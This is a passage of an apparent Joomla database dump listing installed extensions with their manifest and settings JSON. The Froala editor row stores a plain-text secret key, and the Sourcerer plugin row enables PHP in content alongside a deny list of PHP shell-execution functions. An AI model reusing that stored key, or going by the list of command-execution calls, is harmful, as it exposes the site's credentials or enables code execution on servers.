SITE.\",\"group\":\"\",\"filename\":\"lib_f0f\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10205,10230,'plg_content_jce','plugin','jce','content',0,1,1,0,'{\"name\":\"plg_content_jce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"PLG_CONTENT_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10208,0,'Akeeba Backup package','package','pkg_akeeba','',0,1,1,0,'{\"name\":\"Akeeba Backup package\",\"type\":\"package\",\"creationDate\":\"2019-05-29\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"6.5.1\",\"description\":\"Akeeba Backup installation package v.6.5.1\",\"group\":\"\",\"filename\":\"pkg_akeeba\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10212,0,'SP Weather','module','mod_sp_weather','',0,1,0,0,'{\"name\":\"SP Weather\",\"type\":\"module\",\"creationDate\":\"Sep 2012\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2016 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"2.2.5\",\"description\":\"Weather module by JoomShaper.com using Yahoo weather API.\",\"group\":\"\",\"filename\":\"mod_sp_weather\"}','{\"location\":\"London\",\"locationTranslated\":\"\",\"city\":\"1\",\"condition\":\"1\",\"humidity\":\"1\",\"wind\":\"1\",\"forecast\":\"4\",\"tmpl_layout\":\"block\",\"separator\":\"\\/\",\"tempUnit\":\"c\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"useCache\":\"1\",\"cacheTime\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10218,0,'SP Facebook','module','mod_sp_facebook','',0,1,0,0,'{\"name\":\"SP Facebook\",\"type\":\"module\",\"creationDate\":\"May 2011\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.5\",\"description\":\"SP Facebook - All in one facebook module for joomla by JoomShaper.com\",\"group\":\"\",\"filename\":\"mod_sp_facebook\"}','{\"plg_type\":\"likebox\",\"app_id\":\"\",\"plg_lang\":\"en_US\",\"actvity_domain\":\"\",\"actvity_width\":\"300\",\"actvity_height\":\"300\",\"actvity_header\":\"true\",\"actvity_colorscheme\":\"light\",\"actvity_font\":\"\",\"actvity_recommendations\":\"false\",\"comments_url\":\"\",\"auto_url\":\"0\",\"comments_numposts\":\"2\",\"comments_width\":\"300\",\"comments_colorscheme\":\"light\",\"fp_url\":\"\",\"fp_width\":\"300\",\"fp_rows\":\"1\",\"likebox_url\":\"\",\"likebox_width\":\"300\",\"likebox_height\":\"400\",\"likebox_colorscheme\":\"light\",\"likebox_showfaces\":\"true\",\"likebox_stream\":\"true\",\"likebox_header\":\"true\",\"likebox_show_border\":\"true\",\"likebtn_url\":\"\",\"likebtn_sendbtn\":\"true\",\"likebtn_layout\":\"standard\",\"likebtn_width\":\"300\",\"likebtn_showfaces\":\"true\",\"likebtn_verd\":\"like\",\"likebtn_colorscheme\":\"light\",\"likebtn_font\":\"\",\"rec_domain\":\"\",\"rec_width\":\"300\",\"rec_height\":\"300\",\"rec_showheader\":\"true\",\"rec_colorscheme\":\"light\",\"rec_font\":\"\",\"send_url\":\"\",\"send_font\":\"\",\"send_colorscheme\":\"light\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10222,10230,'plg_installer_jce','plugin','jce','installer',0,1,1,0,'{\"name\":\"plg_installer_jce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"PLG_INSTALLER_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10228,10230,'plg_extension_jce','plugin','jce','extension',0,1,1,0,'{\"name\":\"plg_extension_jce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"PLG_EXTENSION_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10229,10230,'plg_quickicon_jce','plugin','jce','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_jce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"PLG_QUICKICON_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10230,0,'PKG_JCE','package','pkg_jce','',0,1,1,0,'{\"name\":\"PKG_JCE\",\"type\":\"package\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.9.1\",\"description\":\"PKG_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pkg_jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10256,0,'atomic','template','atomic','',0,0,1,0,'{\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10257,0,'atomic','template','atomic','',0,0,1,0,'{\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10260,0,'beez5','template','beez5','',0,0,1,0,'{\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10261,0,'beez5','template','beez5','',0,0,1,0,'{\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10262,0,'beez_20','template','beez_20','',0,0,1,0,'{\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10263,0,'beez_20','template','beez_20','',0,0,1,0,'{\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10264,0,'protostar','template','protostar','',0,0,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10265,0,'protostar','template','protostar','',0,0,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10266,0,'hathor','template','hathor','',1,0,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10267,0,'hathor','template','hathor','',1,0,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,-1),(10270,0,'JCE - Russian','file','jce-ru-RU','',0,1,0,0,'{\"name\":\"JCE - Russian\",\"type\":\"file\",\"creationDate\":\"2017-03-01\",\"author\":\"JCE Transifex Russian Team\",\"copyright\":\"\\u00a9 2017 Widget Factory Limited\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"https:\\/\\/www.transifex.com\\/projects\\/p\\/jce\\/language\\/ru-RU\\/\",\"version\":\"2.6.8\",\"description\":\"Russian Language Pack for JCE 2.6.8\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10271,0,'uk-UA','package','pkg_uk-UA','',0,1,1,0,'{\"name\":\"uk-UA\",\"type\":\"package\",\"creationDate\":\"03\\/06\\/2020\",\"author\":\"Denys Nosov\",\"copyright\":\"2006-2020 (C) Joomla! Ukraine (https:\\/\\/joomla-ua.org). All rights reserved.\",\"authorEmail\":\"denys@joomla-ua.org\",\"authorUrl\":\"https:\\/\\/joomla-ua.org\",\"version\":\"3.9.19.1\",\"description\":\"<div style=\\\"background: #fff; border: 1px #ccc solid; padding: 15px; overflow: hidden; text-align: left!important;margin-bottom:20px\\\"><h2>\\u0423\\u043a\\u0440\\u0430\\u0457\\u043d\\u0441\\u044c\\u043a\\u0438\\u0439 \\u043f\\u0430\\u043a\\u0435\\u0442 \\u043b\\u043e\\u043a\\u0430\\u043b\\u0456\\u0437\\u0430\\u0446\\u0456\\u0457 Joomla! 3.9.18 (\\u0432\\u0435\\u0440\\u0441\\u0456\\u044f 3.9.19.1)<\\/h2><h3>Joomla! 3.9.18 Full Ukrainian (uk-UA) Language Package - Version 3.9.19.1<\\/h3><p style=\\\"font-weight: normal!important;\\\">\\u041e\\u0444\\u0456\\u0446\\u0456\\u0439\\u043d\\u0438\\u0439 \\u0441\\u0430\\u0439\\u0442 \\u043b\\u043e\\u043a\\u0430\\u043b\\u0456\\u0437\\u0430\\u0446\\u0456\\u0457: <a href=\\\"https:\\/\\/joomla-ua.org\\/\\\" target=\\\"_blank\\\">Joomla! \\u0423\\u043a\\u0440\\u0430\\u0457\\u043d\\u0430<\\/a><br \\/>\\u0424\\u043e\\u0440\\u0443\\u043c \\u043f\\u0456\\u0434\\u0442\\u0440\\u0438\\u043c\\u043a\\u0438: <a href=\\\"https:\\/\\/joomla-ua.org\\/forum\\/\\\">\\u0424\\u043e\\u0440\\u0443\\u043c Joomla! \\u0423\\u043a\\u0440\\u0430\\u0457\\u043d\\u0430<\\/a><br \\/>GitHub: <a href=\\\"https:\\/\\/github.com\\/Joomla-Ukraine\\/uk-UA\\\">\\u0420\\u0435\\u043f\\u043e\\u0437\\u0438\\u0442\\u043e\\u0440\\u0456\\u0439 \\u0443\\u043a\\u0440\\u0430\\u0457\\u043d\\u0441\\u044c\\u043a\\u043e\\u0457 \\u043b\\u043e\\u043a\\u0430\\u043b\\u0456\\u0437\\u0430\\u0446\\u0456\\u0457<\\/a><br><br><span style=\\\"font-size: 85%;\\\">2006-2020 &copy; Joomla! \\u0423\\u043a\\u0440\\u0430\\u0457\\u043d\\u0430. \\u0412\\u0441\\u0456 \\u043f\\u0440\\u0430\\u0432\\u0430 \\u0437\\u0430\\u0445\\u0438\\u0449\\u0435\\u043d\\u043e!<\\/span><\\/p><\\/div>\",\"group\":\"\",\"filename\":\"pkg_uk-UA\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10272,10274,'PLG_FROALA','plugin','froala','editors',0,1,1,0,'{\"name\":\"PLG_FROALA\",\"type\":\"plugin\",\"creationDate\":\"2015\",\"author\":\"Arkadiy Sedelnikov, JoomLine\",\"copyright\":\"Arkadiy Sedelnikov\",\"authorEmail\":\"a.sedelnikov@gmail.com\",\"authorUrl\":\"http:\\/\\/joomline.ru\",\"version\":\"1.0\",\"description\":\"PLG_FROALA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"froala\"}','{\"secret_key\":\"CTvVmudzdjIaZFP\",\"theme\":\"gray\",\"paragraphy\":\"1\",\"plainPaste\":\"1\",\"convertUrls\":\"1\",\"allowMediaManager\":\"1\",\"allowComments\":\"1\",\"allowScript\":\"0\",\"allowStyle\":\"0\",\"shortcuts\":\"1\",\"allowedAttrs\":[\"*\"],\"allowedTags\":\"\",\"allowedBlankTags\":\"\",\"maxFileSize\":\"2\",\"maxImageSize\":\"3\",\"pasteImage\":\"0\",\"imageUpload\":\"1\",\"allowedImageTypes\":\"jpeg, jpg, png, gif\",\"allowedFileExt\":\"zip,doc,xls,xlsx,docx\",\"allowedFileTypes\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip,application\\/zip\",\"imagesLoadURL\":\"images\",\"filesUploadURL\":\"images\",\"inlineStyles\":\"\'Big Red\': \'font-size: 20px; color: red;\', \'Small Blue\': \'font-size: 14px; color: blue;\'\",\"bold\":\"1\",\"italic\":\"1\",\"underline\":\"1\",\"strikeThrough\":\"1\",\"subscript\":\"1\",\"superscript\":\"1\",\"fontFamily\":\"1\",\"fontSize\":\"1\",\"color\":\"1\",\"formatBlock\":\"1\",\"blockStyle\":\"1\",\"align\":\"1\",\"insertOrderedList\":\"1\",\"insertUnorderedList\":\"1\",\"outdent\":\"1\",\"indent\":\"1\",\"selectAll\":\"1\",\"createLink\":\"1\",\"insertImage\":\"1\",\"insertVideo\":\"1\",\"table\":\"1\",\"undo\":\"1\",\"redo\":\"1\",\"html\":\"1\",\"insertHorizontalRule\":\"1\",\"uploadFile\":\"1\",\"removeFormat\":\"1\",\"fullscreen\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10273,10274,'Editor Froala','plugin','froala','system',0,1,1,0,'{\"name\":\"Editor Froala\",\"type\":\"plugin\",\"creationDate\":\"2015\",\"author\":\"Arkadiy Sedelnikov, JoomLine\",\"copyright\":\"Arkadiy Sedelnikov\",\"authorEmail\":\"a.sedelnikov@gmail.com\",\"authorUrl\":\"http:\\/\\/joomline.ru\",\"version\":\"1.0\",\"description\":\"Editor Froala plugin. Add to frontpages custom Froala stylesheet.\",\"group\":\"\",\"filename\":\"froala\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10274,0,'Froala Editor','package','pkg_froala','',0,1,1,0,'{\"name\":\"Froala Editor\",\"type\":\"package\",\"creationDate\":\"26.01.2015\",\"author\":\"Arkadiy Sedelnikov, JoomLine\",\"copyright\":\"Copyright (c) 2015 Arkadiy, Joomline. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"The installation package Froala editor for Joomla.\",\"group\":\"\",\"filename\":\"pkg_froala\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10279,0,'7777777','template','7777777','',0,1,1,0,'{\"name\":\"7777777\",\"type\":\"template\",\"creationDate\":\"2017-03-27\",\"author\":\"\\u041d\\u0435\\u0438\\u0437\\u0432\\u0435\\u0441\\u0442\\u043d\\u044b\\u0439\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"Artisteer-generated theme\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10301,0,'rada030218_1','template','rada030218_1','',0,1,1,0,'{\"name\":\"rada030218_1\",\"type\":\"template\",\"creationDate\":\"2018-02-03\",\"author\":\"\\u041d\\u0435\\u0438\\u0437\\u0432\\u0435\\u0441\\u0442\\u043d\\u044b\\u0439\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"Artisteer-generated theme\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"blogLayoutType\":\"default\"}','','',0,'0000-00-00 00:00:00',0,0),(10303,0,'file_fef','file','file_fef','',0,1,0,0,'{\"name\":\"file_fef\",\"type\":\"file\",\"creationDate\":\"2022-10-24\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2017-2021 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"2.1.1\",\"description\":\"Akeeba Frontend Framework - The CSS framework for Akeeba Ltd extensions.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10307,10230,'plg_fields_mediajce','plugin','mediajce','fields',0,1,1,0,'{\"name\":\"plg_fields_mediajce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"https:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"PLG_FIELDS_MEDIAJCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mediajce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10320,0,'Часы Joomla','module','mod_artclock','',0,1,0,0,'{\"name\":\"\\u0427\\u0430\\u0441\\u044b Joomla\",\"type\":\"module\",\"creationDate\":\"\\u0410\\u043f\\u0440\\u0435\\u043b\\u044c 2013\",\"author\":\"joomlachasi.ru\",\"copyright\":\"Copyright (C) joomlachasi.ru\",\"authorEmail\":\"joomlachasi@ya.ru\",\"authorUrl\":\"www.joomlachasi.ru\",\"version\":\"2.2.0\",\"description\":\"\\u042d\\u0442\\u043e\\u0442 \\u043c\\u043e\\u0434\\u0443\\u043b\\u044c \\u043f\\u043e\\u043a\\u0430\\u0437\\u044b\\u0432\\u0430\\u0435\\u0442 \\u0447\\u0430\\u0441\\u044b \\u043d\\u0430 \\u0432\\u0430\\u0448\\u0435\\u043c \\u0441\\u0430\\u0439\\u0442\\u0435. \\u041b\\u0435\\u0433\\u043a\\u043e \\u0440\\u0435\\u0433\\u0443\\u043b\\u0438\\u0440\\u0443\\u044e\\u0442\\u0441\\u044f \\u043d\\u0430\\u0441\\u0442\\u0440\\u043e\\u0439\\u043a\\u0438 \\u0438 \\u043d\\u0430\\u0441\\u0442\\u0440\\u0430\\u0438\\u0432\\u0430\\u0435\\u0442\\u0441\\u044f \\u0447\\u0430\\u0441\\u043e\\u0432\\u043e\\u0439 \\u043f\\u043e\\u044f\\u0441. \\u041c\\u043e\\u0436\\u043d\\u043e \\u0432\\u044b\\u0432\\u043e\\u0434\\u0438\\u0442\\u044c \\u043d\\u0430 \\u043e\\u0434\\u043d\\u043e\\u0439 \\u0441\\u0442\\u0440\\u0430\\u043d\\u0438\\u0446\\u0435 \\u043d\\u0435\\u0441\\u043a\\u043e\\u043b\\u044c\\u043a\\u043e \\u0447\\u0430\\u0441\\u043e\\u0432. \\u041c\\u043e\\u0434\\u0443\\u043b\\u044c \\u043d\\u0435 \\u0438\\u0441\\u043f\\u043e\\u043b\\u044c\\u0437\\u0443\\u0435\\u0442 Flash. <br \\/><br \\/>&copy;&nbsp;<a href=\\\"http:\\/\\/joomlachasi.ru\\/\\\">Joomlachasi.ru<\\/a>\",\"group\":\"\",\"filename\":\"mod_artclock\"}','{\"moduleclass_sfx\":\"\",\"@spacer\":\"<br \\/><b>Clock 5<\\/b><hr \\/>\",\"enabled1\":\"1\",\"seconds1\":\"noSeconds\",\"radius1\":\"85\",\"GMTOffset1\":\"\",\"label1\":\"\",\"skin1\":\"swissRail\",\"enabled2\":\"0\",\"seconds2\":\"noSeconds\",\"radius2\":\"85\",\"GMTOffset2\":\"\",\"label2\":\"\",\"skin2\":\"swissRail\",\"enabled3\":\"0\",\"seconds3\":\"noSeconds\",\"radius3\":\"85\",\"GMTOffset3\":\"\",\"label3\":\"\",\"skin3\":\"swissRail\",\"enabled4\":\"0\",\"seconds4\":\"noSeconds\",\"radius4\":\"85\",\"GMTOffset4\":\"\",\"label4\":\"\",\"skin4\":\"swissRail\",\"enabled5\":\"0\",\"seconds5\":\"noSeconds\",\"radius5\":\"85\",\"GMTOffset5\":\"\",\"label5\":\"\",\"skin5\":\"swissRail\",\"enabled6\":\"0\",\"seconds6\":\"noSeconds\",\"radius6\":\"85\",\"GMTOffset6\":\"\",\"label6\":\"\",\"skin6\":\"swissRail\",\"enabled7\":\"0\",\"seconds7\":\"noSeconds\",\"radius7\":\"85\",\"GMTOffset7\":\"\",\"label7\":\"\",\"skin7\":\"swissRail\",\"enabled8\":\"0\",\"seconds8\":\"noSeconds\",\"radius8\":\"85\",\"GMTOffset8\":\"\",\"label8\":\"\",\"skin8\":\"swissRail\",\"enabled9\":\"0\",\"seconds9\":\"noSeconds\",\"radius9\":\"85\",\"GMTOffset9\":\"\",\"label9\":\"\",\"skin9\":\"swissRail\",\"enabled10\":\"0\",\"seconds10\":\"noSeconds\",\"radius10\":\"85\",\"GMTOffset10\":\"\",\"label10\":\"\",\"skin10\":\"swissRail\"}','','',0,'0000-00-00 00:00:00',0,0),(10323,0,'AllVideos (by JoomlaWorks)','plugin','jw_allvideos','content',0,1,1,0,'{\"name\":\"AllVideos (by JoomlaWorks)\",\"type\":\"plugin\",\"creationDate\":\"May 22nd, 2020\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2020 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"6.1.0\",\"description\":\"JW_PLG_AV_XML_DESC\",\"group\":\"\",\"filename\":\"jw_allvideos\"}','{\"playerTemplate\":\"Classic\",\"vfolder\":\"images\\/videos\",\"vwidth\":\"400\",\"vheight\":\"300\",\"transparency\":\"transparent\",\"background\":\"#010101\",\"controls\":\"1\",\"backgroundQT\":\"black\",\"afolder\":\"images\\/audio\",\"awidth\":\"480\",\"aheight\":\"24\",\"abackground\":\"#010101\",\"afrontcolor\":\"#FFFFFF\",\"alightcolor\":\"#00ADE3\",\"allowAudioDownloading\":\"0\",\"autoplay\":\"0\",\"jwPlayerLoading\":\"local\",\"jwPlayerAPIKey\":\"\",\"jwPlayerCDNUrl\":\"\",\"gzipScripts\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10326,0,'plg_editors-xtd_sourcerer','plugin','sourcerer','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_sourcerer\",\"type\":\"plugin\",\"creationDate\":\"September 2019\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"8.1.1\",\"description\":\"PLG_EDITORS-XTD_SOURCERER_DESC\",\"group\":\"\",\"filename\":\"sourcerer\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10327,0,'plg_system_sourcerer','plugin','sourcerer','system',0,1,1,0,'{\"name\":\"plg_system_sourcerer\",\"type\":\"plugin\",\"creationDate\":\"September 2019\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"8.1.1\",\"description\":\"PLG_SYSTEM_SOURCERER_DESC\",\"group\":\"\",\"filename\":\"sourcerer\"}','{\"enable_css\":\"1\",\"enable_js\":\"1\",\"enable_php\":\"1\",\"forbidden_php\":\"dl, escapeshellarg, escapeshellcmd, exec, passthru, popen, proc_close, proc_open, shell_exec, symlink, system\",\"forbidden_tags\":\"\",\"@notice_articles_security_level\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_articles_enable_css\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_articles_enable_js\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_articles_enable_php\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_components_enable_css\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_components_enable_js\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_components_enable_php\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@wizard\":\"0\",\"@noticeother_enable_css\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_other_enable_js\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"@notice_other_enable_php\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"button_text\":\"Code\",\"enable_frontend\":\"1\",\"addsourcetags\":\"1\",\"@notice_use_example_code\":\"RL_ONLY_AVAILABLE_IN_PRO\",\"syntax_word\":\"source\",\"tag_characters\":\"{.}\",\"trim\":\"0\",\"enable_in_head\":\"0\",\"remove_from_search\":\"0\",\"include_path\":\"\\/\",\"place_comments\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10331,0,'Image Show GK4','module','mod_image_show_gk4','',0,1,0,0,'{\"name\":\"Image Show GK4\",\"type\":\"module\",\"creationDate\":\"21 Nov 2017\",\"author\":\"GavickPro\",\"copyright\":\"Copyright (C) 2011-2016 GavickPro. All rights reserved.\",\"authorEmail\":\"info@gavick.com\",\"authorUrl\":\"www.gavickpro.com\",\"version\":\"1.6.0\",\"description\":\"\\n\\t\\t<style type=\\\"text\\/css\\\">\\n\\t\\t\\tspan.readonly { padding: 10px; font-family: Arial; font-size:13px !important; font-weight: normal !important; text-align: justify; color: #4d4d4d; line-height: 24px; }\\n\\t\\t\\tspan.readonly h1 { clear:both; font-family: Georgia, sans-serif; font-size:38px; margin:30px 20px 23px; padding:0px 0px 24px 10px; color:#333; border-bottom: 1px solid #eee; font-weight: normal; }\\n\\t\\t\\tspan.tooltip-content { display: none; }\\n\\t\\t\\t.tip-text span.readonly { display: none; }\\n\\t\\t\\t.tip-text span.tooltip-content { display: block; }\\n\\t\\t\\tspan.readonly p { margin: 0 26px 10px }\\n\\t\\t\\tspan.readonly p a { color: #8e0b8c }\\n\\t\\t\\tspan.readonly p.homepage { margin-top: 30px 